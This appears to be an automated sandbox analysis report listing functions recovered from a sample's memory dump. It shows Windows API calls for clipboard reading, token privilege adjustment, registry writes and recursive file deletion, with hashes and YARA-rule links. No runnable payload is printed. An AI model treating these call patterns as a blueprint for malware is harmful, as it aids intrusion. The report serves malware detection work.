Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 1a293b9fd5d37d769d7f1aea54451014f750fca3cce057b4e0ccd37eddf31a75
Instruction ID: 4e3462e959f8bffff572f98aeee5105cf49daa7502499ad8fcfe9a26f3470634
Opcode Fuzzy Hash: 1a293b9fd5d37d769d7f1aea54451014f750fca3cce057b4e0ccd37eddf31a75
Instruction Fuzzy Hash: ECE04F35400208BBDB20AF94D805B9AB7BCEB04361F10455AFD4091111D7B29E149B94

Function 00C53EF7 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C53E7D,?,?,?), ref: 00C53F0D

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 58768b1382f1e14140e428b3f23c7007c4ba1652bcd0268c80bfc7e254191abb
Instruction ID: 21b3865bcd1dfdb41f58044894fc6f6996b6708d5191c85da21e198bbd7d5198
Opcode Fuzzy Hash: 58768b1382f1e14140e428b3f23c7007c4ba1652bcd0268c80bfc7e254191abb
Instruction Fuzzy Hash: F9D0A7315E020CBBEF50DFA0CC06F68B7ACEB01706F2002A4B504D90E0DAB269189795

Function 00C042AE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00C406E6,00000000,00000000,00000000), ref: 00C042BF

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 37a9932973d9444e1eeee16d9a472f6f46146437019a353679390cc6093a8268
Instruction ID: 994705d3bcff5a11cb64a824745adb6b956349a809c8bd82751e3f74b2eda26f
Opcode Fuzzy Hash: 37a9932973d9444e1eeee16d9a472f6f46146437019a353679390cc6093a8268
Instruction Fuzzy Hash: 65D0C77464020CBFEB10CB80DC46FAD777CE705711F200194FD0466290D6B27D548795

Function 00C54FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00C53BFE), ref: 00C54FED

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f5987a3399d53e6755572f1be0df5518a6016abb4efc24ea6be2d1e18833a6bd
Instruction ID: fa08c9af97c9cfa6108678bf51f938c077f84e6accdc5c4decf481b288eca78f
Opcode Fuzzy Hash: f5987a3399d53e6755572f1be0df5518a6016abb4efc24ea6be2d1e18833a6bd
Instruction Fuzzy Hash: 95B09238000680769D6C1E7C594C69D330158423BEBE81B81E878854E5923989CFA728

Function 00C1547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00C15486

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 545bc0768d4f24040851880adc5c734b2657d14aca89fb9fc4c693cca486ccc1
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 85B092B644020CB7CE012A82EC03A993B299B85668F408020FB0C1C162A673A6A0A689

Function 00C5D6BE Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00C5D842

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: c34b76e220b94a7d031069d0d74f135b64c63642b86fe59250641705a1af545b
Instruction ID: a6586b5b14042718dc16b58b4df7820bc1b234b85f01dac72c4dda0731256b98
Opcode Fuzzy Hash: c34b76e220b94a7d031069d0d74f135b64c63642b86fe59250641705a1af545b
Instruction Fuzzy Hash: A07193342043028FC714EF64C491A6EB7E0AF88355F04466DF996873E2DB30EE89DB96

Function 00C5C270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00C54005: FindFirstFileW.KERNEL32(?,?), ref: 00C5407C
Part of subcall function 00C54005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00C540CC
Part of subcall function 00C54005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C540DD
Part of subcall function 00C54005: FindClose.KERNEL32(00000000), ref: 00C540F4

GetLastError.KERNEL32 ref: 00C5C292

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 512593d4dcd3f9ef5d4b824879a1238dac9e85fb56efbe5e0d3ed73c5f1e0cd5
Instruction ID: 0e553aa907e3ff96deb80ffd4646e80d1d3bcd32a7188e14af5e28e853f940e7
Opcode Fuzzy Hash: 512593d4dcd3f9ef5d4b824879a1238dac9e85fb56efbe5e0d3ed73c5f1e0cd5
Instruction Fuzzy Hash: 24F0A0362102148FCB14EF59D840F6EB7E5AF88721F05C059FA098B392CB70BC46CB98

Function 00C042CF Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,00000000,00C32F8B), ref: 00C042EF

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 78e05d1a97ff16852c4b38a3284f37895175db98b46bd1e6f9d1e722ed0927be
Instruction ID: d0ec9c50f3219a192f1a269a50226c78fa902bc0fb9dcdfa3720371e570c863b
Opcode Fuzzy Hash: 78e05d1a97ff16852c4b38a3284f37895175db98b46bd1e6f9d1e722ed0927be
Instruction Fuzzy Hash: E6E0B6B5500B01CFC7354F1AE804426FBF4FFE13713214A2EE1E6926A0D3B0599ACB50

Non-executed Functions

Function 00C7D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C7D208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C7D249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00C7D28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C7D2B8
SendMessageW.USER32 ref: 00C7D2E1
_wcsncpy.LIBCMT ref: 00C7D359
GetKeyState.USER32(00000011), ref: 00C7D37A
GetKeyState.USER32(00000009), ref: 00C7D387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C7D39D
GetKeyState.USER32(00000010), ref: 00C7D3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C7D3D0
SendMessageW.USER32 ref: 00C7D3F7
SendMessageW.USER32(?,00001030,?,00C7B9BA), ref: 00C7D4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C7D513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C7D526
SetCapture.USER32(?), ref: 00C7D52F
ClientToScreen.USER32(?,?), ref: 00C7D594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C7D5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C7D5BB
ReleaseCapture.USER32 ref: 00C7D5C6
GetCursorPos.USER32(?), ref: 00C7D600
ScreenToClient.USER32(?,?), ref: 00C7D60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C7D669
SendMessageW.USER32 ref: 00C7D697
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C7D6D4
SendMessageW.USER32 ref: 00C7D703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C7D724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C7D733
GetCursorPos.USER32(?), ref: 00C7D753
ScreenToClient.USER32(?,?), ref: 00C7D760
GetParent.USER32(?), ref: 00C7D780
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C7D7E9
SendMessageW.USER32 ref: 00C7D81A
ClientToScreen.USER32(?,?), ref: 00C7D878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C7D8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C7D8D2
SendMessageW.USER32 ref: 00C7D8F5
ClientToScreen.USER32(?,?), ref: 00C7D947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C7D97B

Part of subcall function 00BF29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BF29BC

GetWindowLongW.USER32(?,000000F0), ref: 00C7DA17

Strings

@GUI_DRAGID, xrefs: 00C7D562
F, xrefs: 00C7D8FB

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 3e73e525673f7b8dda0353dd4989f64ea9d2fa975b54c03ac5cd21b9cc4796c0
Instruction ID: c52ff970c3dab2df60ba65a6f80f8038c83faa1af04b5c6017fe0a16bc96a8e8
Opcode Fuzzy Hash: 3e73e525673f7b8dda0353dd4989f64ea9d2fa975b54c03ac5cd21b9cc4796c0
Instruction Fuzzy Hash: 3D429F70205341AFD725DF28C844BAEBBF5FF88320F148619FA6A972A1C7719D54CB52

Function 00C48F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00C49399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C493E3
Part of subcall function 00C49399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C49410
Part of subcall function 00C49399: GetLastError.KERNEL32 ref: 00C4941D

_memset.LIBCMT ref: 00C48F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C48FC3
CloseHandle.KERNEL32(?), ref: 00C48FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C48FEB
GetProcessWindowStation.USER32 ref: 00C49004
SetProcessWindowStation.USER32(00000000), ref: 00C4900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C49028

Part of subcall function 00C48DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C48F27), ref: 00C48DFE
Part of subcall function 00C48DE9: CloseHandle.KERNEL32(?,?,00C48F27), ref: 00C48E10

Strings

winsta0, xrefs: 00C48FE6
, xrefs: 00C48F80
default, xrefs: 00C49023

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: d0b96ac4797b1855bef9bcf37cead6ac2c0578082f1956582c7a4a155fe2d7b0
Instruction ID: 79da45bda25d13d5baf2627b3158a0160d0c0c1488e96a47baa1075733be6b0b
Opcode Fuzzy Hash: d0b96ac4797b1855bef9bcf37cead6ac2c0578082f1956582c7a4a155fe2d7b0
Instruction Fuzzy Hash: 7081697190021ABFDF119FA4CC49AEF7B79FF09324F144129F920A6261D7328E19EB20

Function 00C64632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00C80980), ref: 00C6465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 00C6466A
GetClipboardData.USER32(0000000D), ref: 00C64672
CloseClipboard.USER32 ref: 00C6467E
GlobalLock.KERNEL32(00000000), ref: 00C6469A
CloseClipboard.USER32 ref: 00C646A4
GlobalUnlock.KERNEL32(00000000), ref: 00C646B9
IsClipboardFormatAvailable.USER32(00000001), ref: 00C646C6
GetClipboardData.USER32(00000001), ref: 00C646CE
GlobalLock.KERNEL32(00000000), ref: 00C646DB
GlobalUnlock.KERNEL32(00000000), ref: 00C6470F
CloseClipboard.USER32 ref: 00C6481F

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 2dcbce7353923fe2bfcdd02eb0375b8f847c3c84d29b21542c263276e0988fd0
Instruction ID: f509aabe2fb640193dcaced96e66a70e8f2dc49f8cd408276ae4c095debf1006
Opcode Fuzzy Hash: 2dcbce7353923fe2bfcdd02eb0375b8f847c3c84d29b21542c263276e0988fd0
Instruction Fuzzy Hash: 5C51B031244205AFD354EF60DC8AF6E77A8AF84B11F140529FA56D31E2EF70D909CB6A

Function 00C5CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C5CDD0
FindClose.KERNEL32(00000000), ref: 00C5CE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C5CE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C5CE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C5CE87
__swprintf.LIBCMT ref: 00C5CED3
__swprintf.LIBCMT ref: 00C5CF16

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

__swprintf.LIBCMT ref: 00C5CF6A

Part of subcall function 00C138C8: __woutput_l.LIBCMT ref: 00C13921

__swprintf.LIBCMT ref: 00C5CFB8

Part of subcall function 00C138C8: __flsbuf.LIBCMT ref: 00C13943
Part of subcall function 00C138C8: __flsbuf.LIBCMT ref: 00C1395B

__swprintf.LIBCMT ref: 00C5D007
__swprintf.LIBCMT ref: 00C5D056
__swprintf.LIBCMT ref: 00C5D0A5

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00C5CECD
%4d, xrefs: 00C5CF10
%02d, xrefs: 00C5CF5E, 00C5CF68, 00C5CFB6, 00C5D005, 00C5D054, 00C5D0A3

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 74a702a8fd6ada207032ec54a1a9eb00221314511d7c352b722940f58d9aa0e7
Instruction ID: c55d7ba1a956b62beea80567eeedfae8a567e390934612c9e147642aa4990bcc
Opcode Fuzzy Hash: 74a702a8fd6ada207032ec54a1a9eb00221314511d7c352b722940f58d9aa0e7
Instruction Fuzzy Hash: 51A15FB1504345ABD710EF64C986EAFB7ECEF94704F400929F69583191EB70DA48CB62

Function 00C5F5D8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C5F5F9
_wcscmp.LIBCMT ref: 00C5F60E
_wcscmp.LIBCMT ref: 00C5F625
GetFileAttributesW.KERNEL32(?), ref: 00C5F637
SetFileAttributesW.KERNEL32(?,?), ref: 00C5F651
FindNextFileW.KERNEL32(00000000,?), ref: 00C5F669
FindClose.KERNEL32(00000000), ref: 00C5F674
FindFirstFileW.KERNEL32(*.*,?), ref: 00C5F690
_wcscmp.LIBCMT ref: 00C5F6B7
_wcscmp.LIBCMT ref: 00C5F6CE
SetCurrentDirectoryW.KERNEL32(?), ref: 00C5F6E0
SetCurrentDirectoryW.KERNEL32(00CAB578), ref: 00C5F6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C5F708
FindClose.KERNEL32(00000000), ref: 00C5F715
FindClose.KERNEL32(00000000), ref: 00C5F727

Strings

*.*, xrefs: 00C5F68B

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: f24c80dc4cf59c2b0c8a1cee360406e6cd39f677f3dfa2eeb020a97017dedf39
Instruction ID: 4192097f423e40df08de69c7d9ce2d44efbf0b8ee62fdad0ee5e44e264ecc050
Opcode Fuzzy Hash: f24c80dc4cf59c2b0c8a1cee360406e6cd39f677f3dfa2eeb020a97017dedf39
Instruction Fuzzy Hash: B931D275640219AADF14DBB4DC4DBDE77ACAF09326F200169F814D30A0EB70DE89DB68

Function 00C70EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C70FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,00C80980,00000000,?,00000000,?,?), ref: 00C71021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C71069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C710F2
RegCloseKey.ADVAPI32(?), ref: 00C71412
RegCloseKey.ADVAPI32(00000000), ref: 00C7141F

Strings

REG_SZ, xrefs: 00C71130
REG_QWORD, xrefs: 00C71360
REG_EXPAND_SZ, xrefs: 00C7108F
REG_DWORD, xrefs: 00C712E3
REG_MULTI_SZ, xrefs: 00C711DA
REG_BINARY, xrefs: 00C713AD

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: cd6b0721d2e1bb59d5a7c4fa64aef5fc12dd0294c26e71fc85e709e69d2744ac
Instruction ID: a44e42a3976326343832f9c875a4b52aeeab696b1528dc3e3b7248a3988d1df2
Opcode Fuzzy Hash: cd6b0721d2e1bb59d5a7c4fa64aef5fc12dd0294c26e71fc85e709e69d2744ac
Instruction Fuzzy Hash: 84025D752006119FCB14EF29C881E2AB7E5FF89714F1485ACF95A9B3A2CB30ED45CB91

Function 00C5F735 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C5F756
_wcscmp.LIBCMT ref: 00C5F76B
_wcscmp.LIBCMT ref: 00C5F782

Part of subcall function 00C54875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C54890

FindNextFileW.KERNEL32(00000000,?), ref: 00C5F7B1
FindClose.KERNEL32(00000000), ref: 00C5F7BC
FindFirstFileW.KERNEL32(*.*,?), ref: 00C5F7D8
_wcscmp.LIBCMT ref: 00C5F7FF
_wcscmp.LIBCMT ref: 00C5F816
SetCurrentDirectoryW.KERNEL32(?), ref: 00C5F828
SetCurrentDirectoryW.KERNEL32(00CAB578), ref: 00C5F846
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C5F850
FindClose.KERNEL32(00000000), ref: 00C5F85D
FindClose.KERNEL32(00000000), ref: 00C5F86F

Strings

*.*, xrefs: 00C5F7D3

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

